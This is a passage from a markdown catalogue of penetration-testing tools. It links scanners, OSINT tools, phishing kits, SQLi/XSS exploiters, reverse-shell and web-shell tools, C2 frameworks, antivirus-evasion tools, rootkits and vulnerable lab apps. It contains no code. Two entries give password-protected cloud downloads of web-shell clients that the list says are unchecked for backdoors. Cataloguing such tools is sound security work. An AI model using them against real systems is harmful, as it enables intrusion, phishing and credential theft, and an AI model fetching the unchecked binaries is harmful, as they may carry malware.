Git repository, including data from stash, for white-box auditing and analysis of developers' mind. ![](svg/Windows.svg)![](svg/linux.svg)![](svg/mac.svg) * [GitGraber](https://github.com/hisxo/gitGraber) - gitGraber is a tool developed in Python3 to monitor GitHub to search and find sensitive data in real time for different online services. ![](svg/Windows.svg)![](svg/linux.svg)![](svg/mac.svg) * [GitMiner](https://github.com/UnkL4b/GitMiner) - Tool for advanced mining for content on Github. ![](svg/Windows.svg)![](svg/linux.svg)![](svg/mac.svg) * [Gitrob](https://github.com/michenriksen/gitrob) - Reconnaissance tool for GitHub organizations. ![](svg/Windows.svg)![](svg/linux.svg)![](svg/mac.svg) * [GitGot](https://github.com/BishopFox/GitGot) Semi-automated, feedback-driven tool to rapidly search through troves of public data on GitHub for sensitive secrets. * [GitDump](https://github.com/Ebryx/GitDump) - A pentesting tool that dumps the source code from .git even when the directory traversal is disabled #### SVN * [svnExploit](https://github.com/admintony/svnExploit) - Support for SVN source code disclosure of full version and Dump it. ![](svg/Windows.svg)![](svg/linux.svg)![](svg/mac.svg) * [SvnHack](https://github.com/callmefeifei/SvnHack) - SvnHack is a SVN folder disclosure exploit. :lock: #### Port Scan * [Nmap | Zenmap](https://nmap.org/) - Free and open source utility for network discovery and security auditing * [Masscan](https://github.com/robertdavidgraham/masscan) - TCP port scanner, spews SYN packets asynchronously * [Ports](https://github.com/nixawk/pentest-wiki/blob/master/3.Exploitation-Tools/Network-Exploitation/ports_number.md) - Common service ports and exploitations * [Goby](https://gobies.org/) - Attack surface mapping * [Goscan](https://github.com/marco-lancini/goscan) - Interactive Network Scanner * [NimScan](https://github.com/elddy/NimScan) - 🚀 Fast Port Scanner 🚀 * [RustScan](https://github.com/RustScan/RustScan) - 🤖 The Modern Port Scanner 🤖 * [TXPortMap](https://github.com/4dogs-cn/TXPortMap) - Port Scanner & Banner Identify From TianXiang * [Scaninfo](https://github.com/redtoolskobe/scaninfo) - fast scan for redtools * [SX](https://github.com/v-byte-cpu/sx) - 🖖 Fast, modern, easy-to-use network scanner ![](svg/linux.svg) * [Yujianportscan](https://github.com/foryujian/yujianportscan) A Fast Port Scanner GUI Tools Build by VB.NET + IOCP * [Naabu](https://github.com/projectdiscovery/naabu) - A fast port scanner written in go with a focus on reliability and simplicity. #### OSINT * [theHarvester](https://github.com/laramies/theHarvester)- E-mails, subdomains and names Harvester - OSINT * [SpiderFoot](https://github.com/smicallef/spiderfoot) - SpiderFoot automates OSINT for threat intelligence and mapping your attack surface. * [Recon-ng](https://github.com/lanmaster53/recon-ng) - Open Source Intelligence gathering tool aimed at reducing the time spent harvesting information from open sources. ![](svg/linux.svg) * [FOCA](https://github.com/ElevenPaths/FOCA) - Tool to find metadata and hidden information in the documents. * [Amass](https://github.com/OWASP/Amass) - In-depth Attack Surface Mapping and Asset Discovery * [Censys-subdomain-finder](https://github.com/christophetd/censys-subdomain-finder) - Perform subdomain enumeration using the certificate transparency logs from Censys. * [EmailHarvester](https://github.com/maldevel/EmailHarvester) - Email addresses harvester * [Finalrecon](https://github.com/thewhiteh4t/FinalRecon) - The Last Web Recon Tool You'll Need. * [LittleBrother](https://github.com/lulz3xploit/LittleBrother) - Information gathering (OSINT) on a person (EU) * [Octosuite](https://github.com/rly0nheart/octosuite) - Advanced Github OSINT Framework * [Kunyu](https://github.com/knownsec/Kunyu) - Kunyu, more efficient corporate asset collection * [Glass](https://github.com/s7ckTeam/Glass) - OSINT Framework with Fofa/ZoomEye/Shodan/360 API * [BBOT](https://github.com/blacklanternsecurity/bbot) - OSINT automation for hackers. * [octosuite](https://github.com/bellingcat/octosuite) - Advanced Github OSINT Framework * [GHunt](https://github.com/mxrch/GHunt) - 🕵️‍♂️ Offensive Google framework. ### Phishing * [gophish](https://github.com/gophish/gophish) - Open-Source Phishing Toolkit * [AdvPhishing](https://github.com/Ignitetch/AdvPhishing) - This is Advance Phishing Tool ! OTP PHISHING * [SocialFish](https://github.com/UndeadSec/SocialFish) - Educational Phishing Tool & Information Collector * [Zphisher](https://github.com/htr-tech/zphisher) - An automated phishing tool with 30+ templates. This Tool is made for educational purpose only ! Author will not be responsible for any misuse of this toolkit ! * [Nexphisher](https://github.com/htr-tech/nexphisher) - Advanced Phishing tool for Linux & Termux ### Vulnerability Analysis #### Fuzzing * [httpX](https://github.com/projectdiscovery/httpx) -httpx is a fast and multi-purpose HTTP toolkit that allows running multiple probes using the retryablehttp library. #### Vulnerability Scanner * [Struts-Scan](https://github.com/Lucifer1993/struts-scan) - Struts2 vulnerability detection and utilization tools * [Nikto](https://github.com/sullo/nikto) - Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items * [W3af](https://github.com/andresriancho/w3af/) - Web application attack and audit framework, the open source web vulnerability scanner * [Openvas](http://www.openvas.org/) - The world's most advanced Open Source vulnerability scanner and manager * [Openvas Docker](https://github.com/mikesplain/openvas-docker) * [Archery](https://github.com/archerysec/archerysec) - Open Source Vulnerability Assessment and Management helps developers and pentesters to perform scans and manage vulnerabilities * [Taipan](https://github.com/enkomio/Taipan) - Web application vulnerability scanner * [Arachni](https://github.com/Arachni/arachni) - Web Application Security Scanner Framework * [Nuclei](https://github.com/projectdiscovery/nuclei) - Fast and customizable vulnerability scanner based on simple YAML based DSL. * [Xray](https://github.com/chaitin/xray) - A passive-vulnerability-scanner Tool. ![](svg/Windows.svg)![](svg/linux.svg)![](svg/mac.svg) * [Super-Xray](https://github.com/4ra1n/super-xray) - Web Vulnerability Scanner XRAY GUI Starter ![](svg/Windows.svg) * [SiteScan](https://github.com/kracer127/SiteScan) - AllinOne Website Information Gathering Tools for pentest. * [Banli](https://github.com/Goqi/Banli) - High-risk asset identification and high-risk vulnerability scanner. ![](svg/Windows.svg) * [vscan](https://github.com/veo/vscan) - Open Source Vulnerability Scanner. ![](svg/Windows.svg)![](svg/linux.svg)![](svg/mac.svg) * [Wapiti](https://github.com/wapiti-scanner/wapiti) - Web vulnerability scanner written in Python3. * [Scaninfo](https://github.com/redtoolskobe/scaninfo) - fast scan for redtools * [osv-scanner](https://github.com/google/osv-scanner) - Vulnerability scanner written in Go which uses the data provided by https://osv.dev * [Afrog](https://github.com/zan8in/afrog) - A Vulnerability Scanning Tools For Penetration Testing ### Web Applications #### CMS & Framwork Identification * [AngelSword](https://github.com/Lucifer1993/AngelSword) - CMS vulnerability detection framework :lock: * [WhatWeb](https://github.com/urbanadventurer/WhatWeb) - Next generation web scanner ![](svg/linux.svg) * [Wappalyzer](https://github.com/AliasIO/Wappalyzer) - Cross-platform utility that uncovers the technologies used on websites ![](svg/chrome.svg) * [Whatruns](https://www.whatruns.com/) - A free browser extension that helps you identify technologies used on any website at the click of a button (Just for chrome)![](svg/chrome.svg) * [WhatCMS](https://github.com/HA71/WhatCMS) - CMS Detection and Exploit Kit based on Whatcms.org API * [CMSeeK](https://github.com/Tuhinshubhra/CMSeeK) - CMS Detection and Exploitation suite - Scan WordPress, Joomla, Drupal and over 180 other CMSs * [EHole](https://github.com/EdgeSecurityTeam/EHole) - CMS Detection for RedTeam ![](svg/Windows.svg)![](svg/linux.svg)![](svg/mac.svg) * [ObserverWard](https://github.com/0x727/ObserverWard) - Cross platform community web fingerprint identification tool * [FingerprintHub](https://github.com/0x727/FingerprintHub) - The Database of ObserverWard > Online Tools * [Yunsee](http://www.yunsee.cn/) - Online website for to find the CMS footprint ![](svg/chrome.svg) * [Bugscaner](http://whatweb.bugscaner.com/look/) - A simple online fingerprint identification system that supports hundreds of cms source code recognition ![](svg/chrome.svg) * [WhatCMS online](https://whatcms.org/) - CMS Detection and Exploit Kit website Whatcms.org ![](svg/chrome.svg) * [TideFinger](http://finger.tidesec.com/) - Fingerprinter Tool from TideSec Team :lock: ![](svg/chrome.svg) * [360finger-p](https://fp.shuziguanxing.com/) - Fingerprinter Tool from 360 Team ![](svg/chrome.svg) #### Web Applications Proxies * [Burpsuite](https://portswigger.net/) - Burpsuite is a graphical tool for testing Web application security ![](svg/Windows.svg)![](svg/linux.svg)![](svg/mac.svg) * [ZAP](https://github.com/zaproxy/zaproxy) One of the world’s most popular free security tools ![](svg/Windows.svg)![](svg/linux.svg)![](svg/mac.svg) * [Mitmproxy](https://github.com/mitmproxy/mitmproxy) - An interactive TLS-capable intercepting HTTP proxy for penetration testers and software developers. ![](svg/Windows.svg)![](svg/linux.svg)![](svg/mac.svg) * [Broxy](https://github.com/rhaidiz/broxy) - An HTTP/HTTPS intercept proxy written in Go. ![](svg/Windows.svg)![](svg/linux.svg)![](svg/mac.svg) * [Hetty](https://github.com/dstotijn/hetty) - An HTTP toolkit for security research. ![](svg/Windows.svg)![](svg/linux.svg)![](svg/mac.svg) * [Proxify](https://github.com/projectdiscovery/proxify) - Swiss Army knife Proxy tool for HTTP/HTTPS traffic capture, manipulation, and replay on the go. #### web browser extension * [Hack-Tools](https://github.com/LasCC/Hack-Tools) - The all-in-one Red Team extension for Web Pentester 🛠 #### Web Crawlers & Directory Brute Force * [Dirbrute](https://github.com/Xyntax/DirBrute) - Multi-thread WEB directory blasting tool (with dics inside) :lock: * [Dirb](https://dirb.sourceforge.net/) - DIRB is a Web Content Scanner. It looks for existing (and/or hidden) Web Objects. It basically works by launching a dictionary based attack against a web server and analyzing the responses. ![](svg/Windows.svg)![](svg/linux.svg)![](svg/mac.svg) * [ffuf](https://github.com/ffuf/ffuf) - Fast web fuzzer written in Go. ![](svg/Windows.svg)![](svg/linux.svg)![](svg/mac.svg) * [Dirbuster](https://sourceforge.net/projects/dirbuster/) - DirBuster is a multi threaded java application designed to brute force directories and files names on web/application servers. ![](svg/Windows.svg)![](svg/linux.svg)![](svg/mac.svg) * [Dirsearch](https://github.com/maurosoria/dirsearch) - Web path scanner. ![](svg/Windows.svg)![](svg/linux.svg)![](svg/mac.svg) * [Gobuster](https://github.com/OJ/gobuster) Directory/File, DNS and VHost busting tool written in Go. ![](svg/Windows.svg)![](svg/linux.svg)![](svg/mac.svg) * [WebPathBrute](https://github.com/7kbstorm/7kbscan-WebPathBrute) - Web path Bruter. ![](svg/Windows.svg) * [wfuzz](https://github.com/xmendez/wfuzz) - Web application fuzzer ![](svg/Windows.svg)![](svg/linux.svg) * [Dirmap](https://github.com/H4ckForJob/dirmap) - An advanced web directory & file scanning tool that will be more powerful than DirBuster, Dirsearch, cansina, and Yu Jian. * [YJdirscan](https://github.com/foryujian/yjdirscan) - Yujian dirscan Gui Pro #### Docker Scanners * [Fuxi-Scanner](https://github.com/jeffzh3ng/Fuxi-Scanner) - open source network security vulnerability scanner, it comes with multiple functions. ![](svg/Docker.svg) * [Xunfeng](https://github.com/ysrc/xunfeng) - The patrol is a rapid emergency response and cruise scanning system for enterprise intranets. ![](svg/Docker.svg) * [WebMap](https://github.com/SabyasachiRana/WebMap) - Nmap Web Dashboard and Reporting. ![](svg/Docker.svg) * [Pentest-Collaboration-Framework](https://gitlab.com/invuls/pentest-projects/pcf) - Opensource, cross-platform and portable toolkit for automating routine processes when carrying out various works for testing! ### Database Assessment * [Enumdb](https://github.com/m8sec/enumdb) - Relational database brute force and post exploitation tool for MySQL and MSSQL * [MDUT](https://github.com/SafeGroceryStore/MDUT) - Multiple Database Utilization Tools * [Sylas](https://github.com/Ryze-T/Sylas) - Multiple Database Exploitation Tools * [ODAT](https://github.com/quentinhardy/odat) - Oracle Database Attacking Tool * [MSDAT](https://github.com/quentinhardy/msdat) - Microsoft SQL Database Attacking Tool ### Password Attacks * [Hydra](https://github.com/vanhauser-thc/thc-hydra) - Hydra is a parallelized login cracker which supports numerous protocols to attack * [Medusa](http://foofus.net/goons/jmk/medusa/medusa.html) - Medusa is intended to be a speedy, massively parallel, modular, login brute-forcer * [Sparta](https://github.com/SECFORCE/sparta) - Network Infrastructure Penetration Testing Tool. ![](svg/linux.svg) * [Hashcat](https://github.com/hashcat/hashcat) - World's fastest and most advanced password recovery utility * [Patator](https://github.com/lanjelot/patator) - Patator is a multi-purpose brute-forcer, with a modular design and a flexible usage. * [HackBrowserDat](https://github.com/moonD4rk/HackBrowserData) - Decrypt passwords/cookies/history/bookmarks from the browser * [John](https://github.com/openwall/john) - John the Ripper jumbo - advanced offline password cracker, which supports hundreds of hash and cipher types, and runs on many operating systems, CPUs, GPUs, and even some FPGAs. #### Wordlists * [wordlists](https://github.com/trickest/wordlists/) - Real-world infosec wordlists, updated regularly * [psudohash](https://github.com/t3l3machus/psudohash) - Password list generator that focuses on keywords mutated by commonly used password creation patterns * [wister](https://github.com/cycurity/wister) - A wordlist generator tool, that allows you to supply a set of words, giving you the possibility to craft multiple variations from the given words, creating a unique and ideal wordlist to use regarding a specific target. * [Rockyou](https://gitlab.com/kalilinux/packages/wordlists) - wordlists packaging for Kali Linux. * [Weakpass](https://weakpass.com/) - For any kind of bruteforce find wordlists. ### Wireless Attacks #### Wireless Tools * [Fern Wifi cracker](https://github.com/savio-code/fern-wifi-cracker) - Fern-Wifi-Cracker is designed to be used in testing and discovering flaws in ones own network with the aim of fixing the flaws detected ### Reverse Engineering * [Ollydbg](http://www.ollydbg.de/) - OllyDbg is a 32-bit assembler level analysing debugger for Microsoft Windows ### Exploitation Tools #### Vulnerability Search * [SPLOITUS](https://sploitus.com) - Sploitus is а convenient central place for identifying the newest exploits and finding attacks that exploit known vulnerabilities * [SearchSploit](https://github.com/offensive-security/exploitdb) - The official Exploit Database repository * [Getsploit](https://github.com/vulnersCom/getsploit) - Command line utility for searching and downloading exploits * [Houndsploit](https://github.com/nicolas-carolo/houndsploit) - An advanced graphical search engine for Exploit-DB * [OSV](https://osv.dev/) - Open source vulnerability DB and triage service. #### Cross-site Scripting(XSS) * [BeeF](https://github.com/beefproject/beef) - The Browser Exploitation Framework Project * [BlueLotus_XSSReceiver](https://github.com/firesunCN/BlueLotus_XSSReceiver) - XSS Receiver platform without SQL * [XSStrike](https://github.com/s0md3v/XSStrike) - Most advanced XSS scanner. * [xssor2](https://github.com/evilcos/xssor2) - XSS'OR - Hack with JavaScript. * [Xsser-Varbaek](https://github.com/Varbaek/xsser) - From XSS to RCE 2.75 - Black Hat Europe Arsenal 2017 + Extras * [Xsser-Epsylon](https://github.com/epsylon/xsser) - Cross Site "Scripter" (aka XSSer) is an automatic framework to detect, exploit and report XSS vulnerabilities in web-based applications. * [Xenotix](https://github.com/ajinabraham/OWASP-Xenotix-XSS-Exploit-Framework) - An advanced Cross Site Scripting (XSS) vulnerability detection and exploitation framework * [PwnXSS](https://github.com/pwn0sec/PwnXSS) - PwnXSS: Vulnerability (XSS) scanner exploit * [dalfox](https://github.com/hahwul/dalfox) - 🌙🦊 DalFox is an powerful open source XSS scanning tool and parameter analyzer, utility * [ezXSS](https://github.com/ssl/ezXSS) - ezXSS is an easy way for penetration testers and bug bounty hunters to test (blind) Cross Site Scripting. #### Sql Injection * [Sqlmap](https://github.com/sqlmapproject/sqlmap) - Automatic SQL injection and database takeover tool * [SSQLInjection](https://github.com/shack2/SuperSQLInjectionV1) - SSQLInjection is a SQL injection tool , support Access/MySQL/SQLServer/Oracle/PostgreSQL/DB2/SQLite/Informix Database. * [Jsql-injection](https://github.com/ron190/jsql-injection) jSQL Injection is a Java application for automatic SQL database injection. * [NoSQLMap](https://github.com/codingo/NoSQLMap) - Automated NoSQL database enumeration and web application exploitation tool. * [Sqlmate](https://github.com/s0md3v/sqlmate) - A friend of SQLmap which will do what you always expected from SQLmap * [SQLiScanner](https://github.com/0xbug/SQLiScanner) - Automatic SQL injection with Charles and sqlmap api * [sql-injection-payload-list](https://github.com/payloadbox/sql-injection-payload-list) - 🎯 SQL Injection Payload List * [Advanced-SQL-Injection-Cheatsheet](https://github.com/kleiton0x00/Advanced-SQL-Injection-Cheatsheet) - A cheat sheet that contains advanced queries for SQL Injection of all types. #### Command Injection * [Commix](https://github.com/commixproject/commix) - Automated All-in-One OS command injection and exploitation tool #### File Include * [LFIsuite](https://github.com/D35m0nd142/LFISuite) - Totally Automatic LFI Exploiter (+ Reverse Shell) and Scanner * [Kadimus](https://github.com/P0cL4bs/Kadimus) - Kadimus is a tool to check sites to lfi vulnerability , and also exploit it * [Shellfire](https://github.com/unix-ninja/shellfire) - Exploitation shell for exploiting LFI, RFI, and command injection vulnerabilities * [LFIter2](https://github.com/3mrgnc3/LFIter2) - LFIter2 Local File Include (LFI) Tool - Auto File Extractor & Username Bruteforcer * [FDsploit](https://github.com/chrispetrou/FDsploit) - File Inclusion & Directory Traversal fuzzing, enumeration & exploitation tool. #### File Upload vulnerability * [Fuxploider](https://github.com/almandin/fuxploider) - File upload vulnerability scanner and exploitation tool #### XML External Entity Attack(XXE) * [XXEinjector](https://github.com/enjoiz/XXEinjector) - Tool for automatic exploitation of XXE vulnerability using direct and different out of band methods * [Oxml_xxe](https://github.com/BuffaloWill/oxml_xxe) - A tool for embedding XXE/XML exploits into different filetypes #### Cross-site request forgery (CSRF) * [Deemon](https://github.com/tgianko/deemon/) - Deemon is a tool to detect CSRF in web application #### Deserialization exploit framework * [Ysomap](https://github.com/wh1t3p1g/ysomap) - A helpful Java Deserialization exploit framework. #### Exploit Framework * [POC-T](https://github.com/Xyntax/POC-T) - Pentest Over Concurrent Toolkit * [Pocsuite3](https://github.com/knownsec/pocsuite3) - pocsuite3 is an open-sourced remote vulnerability testing framework developed by the Knownsec 404 Team. * [Metasploit](https://github.com/rapid7/metasploit-framework) - The world’s most used penetration testing framework * [Venom](https://github.com/r00t-3xp10it/venom) - Shellcode generator/compiler/handler (metasploit) * [Empire](https://github.com/BC-SECURITY/Empire) - Empire is a PowerShell and Python post-exploitation agent * [Starkiller](https://github.com/BC-SECURITY/Starkiller) - Starkiller is a Frontend for PowerShell Empire. * [Koadic](https://github.com/zerosum0x0/koadic) - Koadic C3 COM Command & Control - JScript RAT * [Viper](https://github.com/FunnyWolf/Viper) - metasploit-framework UI manager Tools * [MSFvenom-gui](https://github.com/ssooking/msfvenom-gui) - gui tool to create normal payload by msfvenom * [MYExploit](https://github.com/achuna33/MYExploit) - A GUI Tools for Scanning OA vulnerabilities #### Machine Learning * [DeepExploit](https://github.com/13o-bbr-bbq/machine_learning_security/tree/master/DeepExploit) - Fully automatic penetration test tool using Machine Learning * [GyoiThon](https://github.com/gyoisamurai/GyoiThon) - GyoiThon is a growing penetration test tool using Machine Learning * [Generator](https://github.com/13o-bbr-bbq/machine_learning_security/tree/master/Generator) - Fully automatically generate numerous injection codes for web application assessment #### Automate * [AutoSploit](https://github.com/NullArray/AutoSploit) - Automated Mass Exploiter * [WinPwn](https://github.com/SecureThisShit/WinPwn) - Automation for internal Windows Penetrationtest / AD-Security ### Sniffing & Spoofing * [WireShark](https://github.com/wireshark/wireshark) - Wireshark is a network traffic analyzer, or "sniffer", for Unix and Unix-like operating systems. * [Cain & able](http://www.oxid.it/cain.html) - Cain & Abel is a password recovery tool for Microsoft Operating Systems. ### Maintaining Access #### Shell * [Goshell](https://github.com/eze-kiel/goshell) - Generate reverse shells in command line with Go ! * [Print-My-Shell](https://github.com/sameera-madushan/Print-My-Shell) - Python script wrote to automate the process of generating various reverse shells. * [Reverse-shell-generator](https://github.com/0dayCTF/reverse-shell-generator) - Hosted Reverse Shell generator with a ton of functionality. -- (Great for CTFs) * [Girsh](https://github.com/nodauf/Girsh) - Automatically spawn a reverse shell fully interactive for Linux or Windows victim * [Blueshell](https://github.com/whitehatnote/BlueShell) - Generate a reverse shells for RedTeam * [Clink](http://mridgers.github.io/clink/) - Powerful Bash-style command line editing for cmd.exe * [Natpass](https://github.com/jkstack/natpass) - A new RAT Tools, Support Web VNC and Webshell * [Platypus](https://github.com/WangYihang/Platypus) 🔨 A modern multiple reverse shell sessions manager written in go * [shells](https://github.com/4ndr34z/shells/) - Script for generating revshells * [Reverse_ssh](https://github.com/NHAS/reverse_ssh) - SSH based reverse shell * [Hoaxshell](https://github.com/t3l3machus/hoaxshell) - A Windows reverse shell payload generator and handler that abuses the http(s) protocol to establish a beacon-like reverse shell. #### Listener * [Netcat](https://netcat.sourceforge.net/) - Netcat is a featured networking utility which reads and writes data across network connections, using the TCP/IP protocol. * [Rustcat](https://github.com/robiot/rustcat) - Rustcat(rcat) - The modern Port listener and Reverse shell. * [Rlwrap](https://github.com/hanslub42/rlwrap) - A readline wrapper. * [Pwncat](https://github.com/calebstewart/pwncat) - Fancy reverse and bind shell handler. * [Powercat](https://github.com/besimorhino/powercat) - netshell features all in version 2 powershell. * [Socat](https://repo.or.cz/socat.git) - Socat is a flexible, multi-purpose relay tool. #### Web Shell * Chopper > Tips: The tool comes from the network, no backdoor verification, please choose it on yourself...... > Link: https://pan.baidu.com/s/1VnXkoQU-srSllG6JaY0nTA Password: v71d * [AntSword](https://github.com/AntSwordProject/antSword) : [Document](https://doc.u0u.us/zh-hans/index.html) - AntSword is a cross-platform website management toolkit * [CKnife](https://github.com/Chora10/Cknife) - The cross platform webshell tool in java > Tips: The tool comes from the network, no backdoor verification, please choose it on yourself...... > Link: https://pan.baidu.com/s/1QZrnWU7DUuJhiXl7u1kELw Password: hjrh * [Behinder](https://github.com/rebeyond/Behinder) - dynamic binary encryption webshell management client * [Godzilla](https://github.com/BeichenDream/Godzilla) - a Java tool to encrypt network traffic * [Skyscorpion](https://github.com/shack2/skyscorpion) - Modified version of Behinder. * [PyShell](https://github.com/JoelGMSec/PyShell) - Multiplatform Python WebShell. * [Weevely3](https://github.com/epinna/weevely3) - Weaponized web shell. * [Bantam](https://github.com/gellin/bantam) - A PHP backdoor management and generation tool/C2 featuring end to end encrypted payload streaming designed to bypass WAF, IDS, SIEM systems. * [Awsome-Webshells](https://github.com/abhinavprasad47/Awsome-Webshells) - Collection of reverse shells. * [php-reverse-shell](https://github.com/pentestmonkey/php-reverse-shell) - Simple php reverse shell implemented using binary. #### Privilege Escalation Auxiliary * [windows-exploit-suggester](https://github.com/GDSSecurity/Windows-Exploit-Suggester) - This tool compares a targets patch levels against the Microsoft vulnerability database in order to detect potential missing patches on the target * [Windows-kernel-exploits](https://github.com/SecWiki/windows-kernel-exploits) - windows-kernel-exploits * [linux-exploit-suggester-2](https://github.com/jondonas/linux-exploit-suggester-2) - Next-Generation Linux Kernel Exploit Suggester * [Linux-kernel-exploits](https://github.com/SecWiki/linux-kernel-exploits) - linux-kernel-exploits Linux * [BeRoot](https://github.com/AlessandroZ/BeRoot) - Privilege Escalation Project - Windows / Linux / Mac * [PE-Linux](https://github.com/WazeHell/PE-Linux) - Linux Privilege Escalation Tool By WazeHell * [Portia](https://github.com/SpiderLabs/portia) - Portia aims to automate a number of techniques commonly performed on internal network penetration tests after a low privileged account has been compromised. * [PEASS-ng](https://github.com/carlospolop/PEASS-ng) - PEASS - Privilege Escalation Awesome Scripts SUITE (with colors) * [GTFOBins](https://gtfobins.github.io/) - GTFOBins is a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems. * [LOLBAS](https://lolbas-project.github.io/) - Living Off The Land Binaries, Scripts and Libraries. * [WADComs](https://wadcoms.github.io/) - WADComs is an interactive cheat sheet, containing a curated list of offensive security tools and their respective commands, to be used against Windows/AD environments. * [HijackLibs](https://hijacklibs.net/) - DLL Hijacking is, in the broadest sense, tricking a legitimate/trusted application into loading an arbitrary DLL. * [GTFOBLookup](https://github.com/nccgroup/GTFOBLookup) - Offline command line lookup utility for GTFOBins、LOLBAS and WADComs. * [PrintNotifyPotato](https://github.com/BeichenDream/PrintNotifyPotato) - PrintNotifyPotato #### C2 * [DeimosC2](https://github.com/DeimosC2/DeimosC2) - DeimosC2 is a Golang command and control framework for post-exploitation. * [Sliver](https://github.com/BishopFox/sliver) - Implant framework * [PHPSploit](https://github.com/nil0x42/phpsploit) - Full-featured C2 framework which silently persists on webserver via evil PHP oneliner 😈 * [Shad0w](https://github.com/bats3c/shad0w) - A post exploitation framework designed to operate covertly on heavily monitored environments (Win8、Win10) * [Covenant](https://github.com/cobbr/Covenant) - Covenant is a collaborative .NET C2 framework for red teamers. * [Emp3r0r](https://github.com/jm33-m0/emp3r0r) - linux post-exploitation framework made by linux user * [C3](https://github.com/FSecureLABS/C3) - Custom Command and Control (C3). A framework for rapid prototyping of custom C2 channels, while still providing integration with existing offensive toolkits. * [byob](https://github.com/malwaredllc/byob) - An open-source post-exploitation framework for students, researchers and developers. * [Havoc](https://github.com/HavocFramework/Havoc) - Havoc is a modern and malleable post-exploitation command and control framework. * [Villain](https://github.com/t3l3machus/Villain) - Villain is a Windows & Linux backdoor generator and multi-session handler that allows users to connect with sibling servers (other machines running Villain) and share their backdoor sessions, handy for working as a team. #### Bypass AV * [Shellcodeloader](https://github.com/knownsec/shellcodeloader) - ShellcodeLoader of windows can bypass AV. * [AV_Evasion_Tool](https://github.com/1y0n/AV_Evasion_Tool) - AntiVirus Shellcode generation tool. * [BypassAntiVirus](https://github.com/TideSec/BypassAntiVirus) - Remote control anti-kill series articles and supporting tools. * [MateuszEx](https://github.com/sairson/MateuszEx) - Bypass AV generation tool * [FourEye](https://github.com/lengjibo/FourEye) - AV Evasion Tool For Red Team Ops * [Phantom-Evasion](https://github.com/oddcod3/Phantom-Evasion) - Python antivirus evasion tool ### Golang Sec Tools > Tips: Golang is a excellent cross platform language for security. * [Naabu](https://github.com/projectdiscovery/naabu) - A fast port scanner written in go with focus on reliability and simplicity. * [ServerScan](https://github.com/Adminisme/ServerScan) - A high concurrency network scanning and service detection tool developed by golang. ### Reporting & Collaboration * [Vulnreport](https://github.com/salesforce/vulnreport) - Open-source pentesting management and automation platform by Salesforce Product Security * [Pentest-Collaboration-Framework](https://gitlab.com/invuls/pentest-projects/pcf) - Opensource, cross-platform and portable toolkit for automating routine processes when carrying out various works for testing! * [CervantesSec](https://github.com/CervantesSec/cervantes) - Cervantes is an opensource collaborative platform for pentesters or red teams who want to save time to manage their projects, clients, vulnerabilities and reports in one place. ### Social Engineering Tools ### Code Audit * [Cloc](https://github.com/AlDanial/cloc) - cloc counts blank lines, comment lines, and physical lines of source code in many programming languages * [Cobra](https://github.com/WhaleShark-Team/cobra) - Source Code Security Audit * [Cobra-W](https://github.com/LoRexxar/Cobra-W) - Cobra for white hat * [Graudit](https://github.com/wireghoul/graudit) - Grep rough audit - source code auditing tool * [Rips](https://github.com/ripsscanner/rips) - A static source code analyser for vulnerabilities in PHP scripts * [Kunlun-M](https://github.com/LoRexxar/Kunlun-M) - KunLun-M is a static code analysis system that automates the detecting vulnerabilities and security issue. ### Intranet penetration #### Service Detection * [Netspy](https://github.com/shmilylty/netspy) - A tool to quickly detect the reachable network segments of the intranet. * [Cube](https://github.com/JKme/cube) - Intranet penetration testing tools, weak password blasting, information collection and vulnerability scanning. #### Port Forwarding & Proxies * [EarthWorm](https://github.com/rootkiter/EarthWorm) - Tool for tunnel * [Termite](https://github.com/rootkiter/Termite/) - Tool for tunnel (Version 2) * [Frp](https://github.com/fatedier/frp) - A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet * [Nps](https://github.com/ehang-io/nps/) - A lightweight, high-performance, powerful intranet penetration proxy server, with a powerful web management terminal. * [Goproxy](https://github.com/snail007/goproxy) - A high-performance, full-featured, cross platform proxy server * [ReGeorg](https://github.com/sensepost/reGeorg) - The successor to reDuh, pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn * [Neo-reGeorg](https://github.com/L-codes/Neo-reGeorg) - Neo-reGeorg is a project that seeks to aggressively refactor reGeorg * [Venom](https://github.com/Dliv3/Venom) - A Multi-hop Proxy for Penetration Testers * [Stowaway](https://github.com/ph4ntonn/Stowaway) - 👻 Stowaway -- Multi-hop Proxy Tool for pentesters * [rport](https://github.com/cloudradar-monitoring/rport) - Manage remote systems with ease. * [PortForward](https://github.com/knownsec/PortForward) - The port forwarding tool developed by Golang solves the problem that the internal and external networks cannot communicate in certain scenarios. * [Suo5](https://github.com/zema1/suo5) - A high-performance http proxy tunneling tool ### DevSecOps ### RootKit * [Beurk](https://github.com/unix-thrust/beurk) - BEURK Experimental Unix RootKit * [Bedevil](https://github.com/naworkcaj/bdvl) - LD_PRELOAD Linux rootkit (x86 & ARM) ### Audit Tools * [DevAudit](https://github.com/OSSIndex/DevAudit) - Open-source, cross-platform, multi-purpose security auditing tool ### Pentesting Distribution * [Backbox Linux](https://linux.backbox.org) - penetration testing and security assessment oriented Linux distribution * [Kali Linux](https://www.kali.org) - Debian-based pentesting distribution * [BlackArch Linux](https://blackarch.org) - Arch Linux-based penetration testing distribution * [Parrot Security](https://parrotlinux.org) - The ultimate framework for your Cyber Security operations * [ArchStrike](https://archstrike.org) - Arch Linux respository for security professionals ### Cyber Range #### Vulnerability application * [DVWA](https://github.com/ethicalhack3r/DVWA) - Damn Vulnerable Web Application (DVWA) * [WebGoat](https://github.com/WebGoat/WebGoat) - WebGoat is a deliberately insecure web application maintained by OWASP designed to teach web application security lessons * [DSVW](https://github.com/stamparm/DSVW) - DSVW is a deliberately vulnerable web application written in under 100 lines of code, created for educational purposes * [DVWS](https://github.com/snoopysecurity/dvws) - Damn Vulnerable Web Services is an insecure web application with multiple vulnerable web service components that can be used to learn real world web service vulnerabilities * [XVWA](https://github.com/s4n7h0/xvwa) - XVWA is a badly coded web application written in PHP/MySQL that helps security enthusiasts to learn application security * [BWAPP](http://www.mmebvba.com/sites/bwapp/index.htm) - A buggy web application whit more than 100 vulnerabilities * [Sqli-lab](https://github.com/Audi-1/sqli-labs) - SQLI labs to test error based, Blind boolean based, Time based * [HackMe-SQL-Injection-Challenges](https://github.com/breakthenet/HackMe-SQL-Injection-Challenges) - Hack your friend's online MMORPG game - specific focus, sql injection opportunities * [XSS-labs](https://github.com/paralax/xss-labs) - Small set of scripts to practice exploit XSS and CSRF vulnerabilities * [SSRF-lab](https://github.com/m6a-UdS/ssrf-lab) - Lab for exploring SSRF vulnerabilities * 